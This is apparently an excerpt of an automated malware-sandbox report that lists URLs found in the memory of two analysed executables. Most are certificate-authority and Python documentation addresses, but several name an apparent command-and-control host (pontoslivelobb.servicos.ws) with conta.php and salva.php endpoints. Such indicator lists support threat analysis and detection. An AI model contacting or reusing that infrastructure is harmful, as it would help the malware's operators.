0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED92000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2400747889.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAss
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED92000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: bOamY.exe, 00000010.00000002.3390415291.000001E4F6550000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391182495.0000018B97180000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: bOamY.exe, 00000010.00000002.3391941132.000001E4F6C40000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391733268.0000018B97470000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: bOamY.exe, 00000010.00000002.3391892687.000001E4F6C00000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391733268.0000018B97470000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: bOamY.exe, 00000010.00000002.3391842398.000001E4F6BC0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391647498.0000018B973F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/library/unittest.html
Source: registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B94492000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail
Source: registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
Source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://httpbin.org/
Source: bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B96988000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96DAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json.org
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es0
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.esx
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED92000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2339985653.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2399145620.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2427804221.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: registry_4131f52c.exe, 00000018.00000002.3391973690.0000018B975D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/conta.php
Source: bOamY.exe, 00000010.00000002.3389142745.000001E4F6160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/conta.phpp
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/conta.phprg
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/conta.phprg)
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3389142745.000001E4F6160000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389204732.0000018B96990000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/salva.php
Source: bOamY.exe, 00000010.00000002.3389142745.000001E4F6160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pontoslivelobb.servicos.ws/salva.phpp
Source: python38.dll.23.dr String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96EE6000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/&
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/76
Source: registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/tV
Source: bOamY.exe, 00000010.00000002.3389896366.000001E4F6370000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389805643.0000018B96BA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2339985653.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2402944871.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2339985653.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2402944871.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2339985653.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2402944871.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es00
Source: registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0J
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F67DB000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
